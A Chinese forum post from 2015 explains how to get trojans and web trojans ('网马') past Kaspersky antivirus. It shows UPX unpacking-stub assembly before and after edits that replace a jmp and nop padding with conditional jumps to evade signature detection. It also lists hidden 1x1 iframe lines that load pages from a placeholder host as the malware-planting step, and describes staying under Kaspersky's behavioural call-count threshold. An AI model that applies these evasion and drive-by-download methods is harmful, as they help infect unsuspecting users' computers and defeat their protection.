TA的每日心情 | 慵懒 2015-1-8 08:46 |
---|
签到天数: 2 天 连续签到: 1 天 [LV.1]测试小兵
|
请容许我称呼那些所谓的“黑客”为次黑客,因为我实在无法将一些只会脚本或者shellcode的小孩子称为黑客。
下面开始我们的正题:
卡巴虽然因为自己的急性子遭到很多批评,但大家对卡巴的热情一直没有冷却,卡巴的强性杀毒能力,特别是卡巴强大的主动防御功能令大多数用户十分满意。
今天我们讲一下在黑客界里是如何将自己的网马绕过卡巴的。
对于木马免杀大家一般是采用加壳和特征码免杀两种(N年前还有一个是修改头文件地址的,不过经常导致木马无法使用而未被接受;还有一个是将部分代码换位,以木马的执行过程的改变来绕过杀毒软件的查杀)。加壳最简单,但免杀效果不好。特征码免杀效果非常好,也是现在主流的木马免杀方法,但其技术含量及难度、复杂度都比较高。
小菜鸟都在用加壳,技术一些的在做特征免杀,这几乎成了次黑客界的规范。
但今年爆出了通过修改加壳步骤来达到高效免杀的方法,而且是百分百过卡巴....。(估计是一个经常用代码换位而又想达到特征码免杀效果的人发现的吧)
其大意是将木马反汇编指令进行简单修改。比如UPX壳(我比较喜欢UPX,仅以它为例)
004CE240 复> 60 pushad
004CE241 BE 00504700 mov esi,复件.00475000
004CE246 8DBE 00C0F8FF lea edi,dword ptr ds:[esi+FFF8C000]
004CE24C C787 0CA70800 A5>mov dword ptr ds:[edi+8A70C],59AD25>
004CE256 57 push edi
004CE257 83CD FF or ebp,FFFFFFFF
004CE25A EB 0E jmp short 复件.004CE26A
004CE25C 90 nop
004CE25D 90 nop
004CE25E 90 nop
004CE25F 90 nop
004CE260 8A06 mov al,byte ptr ds:[esi]
修改后如下
004CE240 复> 60 pushad
004CE241 BE 00504700 mov esi,复件.00475000
004CE246 8DBE 00C0F8FF lea edi,dword ptr ds:[esi+FFF8C000]
004CE24C C787 0CA70800 A5>mov dword ptr ds:[edi+8A70C],59AD25>
004CE256 57 push edi
004CE257 83CD FF or ebp,FFFFFFFF
004CE25A 77 0E ja short 复件.004CE26A
004CE25C 73 0C jnb short 复件.004CE26A
004CE25E 72 0A jb short 复件.004CE26A
004CE260 8A06 mov al,byte ptr ds:[esi]
看到 我们只要将
004CE25A
004CE25C
004CE25D
004CE25E
004CE25F
等几位的汇编指令少加修改就可以。最简单的一些甚至直接将指令转换或者位数变化就可以。这不禁让我们想起了当年的将asp马改为asa后缀的拿shell方法。
卡巴的悲哀
我们再讲一下卡吧主动防御中的一个独有功能。
卡巴在脚本主动防御方面主要是对调用次数(默认为8)次进行查杀。也就是一个函数我们调用次数超过8次,无论是不是木马,卡巴都会认为是木马。
举例: 我们的网马已经做好了免杀(不管是通过加壳还是特征码,反正现在免杀了)
然后我们挂马 因为某些需要 我们是要挂很多马的,或者直接挂下载者,不管是用什么方法,都要涉及到函数调用(很多马你当然得调用很多次了),比如下面这个
<iframe src=http://www.XXX.com/dm/1.htm width=1 height=1></iframe>
<iframe src=http://www.XXX.com/dm/2.htm width=1 height=1></iframe>
<iframe src=http://www.XXX.com/dm/3.htm width=1 height=1></iframe>
<iframe src=http://www.XXX.com/dm/4.htm width=1 height=1></iframe>
<iframe src=http://www.XXX.com/dm/5.htm width=1 height=1></iframe>
<iframe src=http://www.XXX.com/dm/6.htm width=1 height=1></iframe>
<iframe src=http://www.XXX.com/dm/7.htm width=1 height=1></iframe>
<iframe src=http://www.XXX.com/dm/8.htm width=1 height=1></iframe>
<iframe src=http://www.XXX.com/dm/9.htm width=1 height=1></iframe>
即使1,2,3,4,5,6,7,8,9都是免杀的,但这时候卡巴仍然是报毒的,why? 9次啊 大哥 你用8次它就报了。。。。。。。。。。为什么卡巴报8次 而别的杀软不报呢?因为这不是技术上的东西,而是制造者心理上的东西。卡巴的制造者认为一个正常的程序不可能调用8次的函数。
有时程序员在编写程序时会突然卡巴报警,其实不是病毒,而是你对某个函数调用次数超过8次了。
当然 卡巴并不是对所有函数都有调用8次的限制的 大绝大部分都有8次限制 不是个别现象
所以 为了防止卡巴的8次限制查杀,大家想出了很多办法 比如 一次函数调用包含了两个文件 或者采用不同的函数调用等等(这里不是黑客网站,这一点不做介绍了)
第一步 网马免杀 第二步 过了卡巴的主动(前提是在网马利用的IE漏洞仍然存在的情况下,不然木马连和卡巴亲密的接触机会都没有,呵呵,除非你用Q传给人家或者人家自己下载下来...)
这里只是讲了一点过卡巴的简单方法,很多好的方法我也没接触过(我不是做免杀的高手)
次黑客世界的很多东西其实是超前于安全领域的。这也是为什么大家都觉得防御比入侵要简单,安全产品不断完善,安全维护不断模式化,而黑色产业却仍未败落的主要原因。
媒体经常告诉广大网民的一句话就是"安全领域已得到迅速发展,黑色产业已经败落,但安全形式依然严峻"这些记者都不是次黑客界的人,确切说他们根本没接触过次黑客界的人.实情是,黑色产业的确不好做了,但因此黑色产业价值提升了,赚的钱更多了/// |
|